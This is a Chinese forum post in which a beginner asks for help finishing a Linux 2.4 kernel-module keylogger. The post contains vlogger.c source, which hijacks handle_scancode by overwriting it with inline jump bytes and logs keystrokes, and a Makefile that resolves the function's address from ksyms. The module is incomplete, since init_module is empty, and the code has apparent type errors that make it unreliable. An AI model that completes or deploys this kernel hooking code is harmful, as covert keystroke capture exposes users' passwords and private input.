关于劫持handle_scancode函数获得键盘记录求解
本人刚接触linux ,想做一个小小的键盘记录器,从网上DOWN了一些资料,接下去不知道该怎么写了,望各位高手指点指点vlogger.c 文件:
#ifndef __KERNEL_SYSCALLS__
#define __KERNEL_SYSCALLS__
#endif
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/string.h>
#include <linux/interrupt.h>
#include <asm/semaphore.h>
#include <linux/init.h>
#include <linux/inet.h>
#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif
#if CONFIG_MODVERSIONS==1
#define MODVERSIONS
#include <linux/modversions.h>
#endif
//#define printk printk_R1B7D4074
static struct semaphore hserials_sem;
static int logging=1;
#define CODESIZE 7
static char hserials_code;
static char hserials_jump="\xb8\x00\x00\x00\xff\xe0";
void (*handle_scancode)(unsigned char,int) =(void(*)(unsigned char,int))
HS_ADDRESS;
void _handle_scancode(unsigned char scancode,int keydown)
{
if (logging && keydown)
// sprintf(KERN_ALERT "SCAN CODE %x .\n",(int)*((char *)scancode)&0x7F);
// log_scancode(scancode,LOGFILE);
printk("Scan Code %x %s.\n",
(int) *((char *) scancode) & 0x7F,
*((char *) scancode) & 0x80 ? "Released" : "Pressed");
///////////无输出,
down(&hserials_sem);
memcpy(handle_scancode,hserials_code,CODESIZE);
handle_scancode(scancode,keydown);
memcpy(handle_scancode,hserials_jump,CODESIZE);
up(&hserials_sem);
}
int init_module(void)
{
//不知道写什么
return 0;
}
void cleanup_module(void)
{
return;
}
MODULE_LICENSE("GPL");
makefile 文件:
# Makefile for a basic kernel module
HS_ADDRESS=0x$(word 1,$(shell ksyms -a|grep handle_scancode))
CC=/usr/bin/gcc
MODCFLAGS = -O6 -Wall -DCONFIG_KERNELD \
-DMODULE -D__KERNEL__ -DLINUX -D HS_ADDRESS=$(HS_ADDRESS)\
-I/usr/src/linux-2.4/include
vlogger.o: vlogger.c/usr/include/linux/version.h
$(CC) $(MODCFLAGS) -c vlogger.c
clean:
rm -f *.o
页:
[1]